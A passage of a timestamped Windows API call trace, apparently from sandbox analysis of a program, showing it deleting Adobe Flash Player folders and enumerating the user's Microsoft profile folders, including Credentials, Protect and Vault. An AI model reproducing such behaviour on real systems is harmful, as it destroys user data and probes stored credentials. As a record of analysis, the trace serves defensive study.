cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 0 [0309.091] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0309.092] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0309.092] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\", lpFilePart=0x0) returned 0x39 [0309.092] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NativeCache", cAlternateFileName="NATIVE~1")) returned 1 [0309.093] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0309.093] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0309.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0309.093] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0309.093] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpFilePart=0x0) returned 0x44 [0309.093] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpFilePart=0x0) returned 0x45 [0309.093] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.094] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.094] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0309.094] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0309.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0309.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0309.095] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpFilePart=0x0) returned 0x44 [0309.095] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\", lpFilePart=0x0) returned 0x45 [0309.095] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.095] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.095] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0309.095] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0b8) returned 1 [0309.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0c4) returned 1 [0309.096] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", nBufferLength=0x105, lpBuffer=0x1aec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpFilePart=0x0) returned 0x44 [0309.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d0) returned 1 [0309.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\nativecache"), fInfoLevelId=0x0, lpFileInformation=0x1af150 | out: lpFileInformation=0x1af150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42a37b71, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42a37b71, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0cc) returned 1 [0309.096] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player\\nativecache")) returned 1 [0309.097] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", nBufferLength=0x105, lpBuffer=0x1aeccc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player", lpFilePart=0x0) returned 0x38 [0309.097] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af118) returned 1 [0309.097] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player"), fInfoLevelId=0x0, lpFileInformation=0x1af198 | out: lpFileInformation=0x1af198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x38a1fca7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x38a1fca7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af114) returned 1 [0309.097] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe\\Flash Player" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe\\flash player")) returned 1 [0309.098] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", nBufferLength=0x105, lpBuffer=0x1aed14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe", lpFilePart=0x0) returned 0x2b [0309.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af160) returned 1 [0309.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe"), fInfoLevelId=0x0, lpFileInformation=0x1af1e0 | out: lpFileInformation=0x1af1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42a37b71, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x38a21043, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x38a21043, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0309.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af15c) returned 1 [0309.098] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\adobe")) returned 1 [0309.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.098] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0309.099] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", lpFilePart=0x0) returned 0x30 [0309.099] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.099] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0309.100] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e1db4, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x811e1db4, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x811e1db4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0309.100] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80e898ff, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x80e898ff, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80e898ff, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0309.100] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x44687ae6, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44687ae6, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x44687ae6, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0309.100] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0309.100] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0309.101] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3cefc6a2, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0309.101] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3704a98f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x3704a98f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x3704a98f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0309.101] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3fb46a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x6f3fb46a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x6f3fb46a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0309.101] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80f7a98f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa45e20df, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa45e20df, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0309.101] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x661c6965, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0309.102] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x44792966, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x44792966, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x50866c1c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0309.102] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x563371fc, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x5635d3c1, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x5635d3c1, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling", cAlternateFileName="")) returned 1 [0309.102] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0309.102] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0309.103] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb898985, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0xb898985, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0xb898985, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1 [0309.103] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x43708645, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x43708645, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0309.103] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0309.103] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x811e4423, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x31c6a486, ftLastAccessTime.dwHighDateTime=0x1d7b063, ftLastWriteTime.dwLowDateTime=0x31c6a486, ftLastWriteTime.dwHighDateTime=0x1d7b063, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0309.103] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0309.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0309.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0309.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af188) returned 1 [0309.104] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x1aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2f [0309.104] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", nBufferLength=0x105, lpBuffer=0x1aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\", lpFilePart=0x0) returned 0x30 [0309.104] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x1aeeb0 | out: lpFindFileData=0x1aeeb0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0309.104] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x661c6965, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x661c6965, 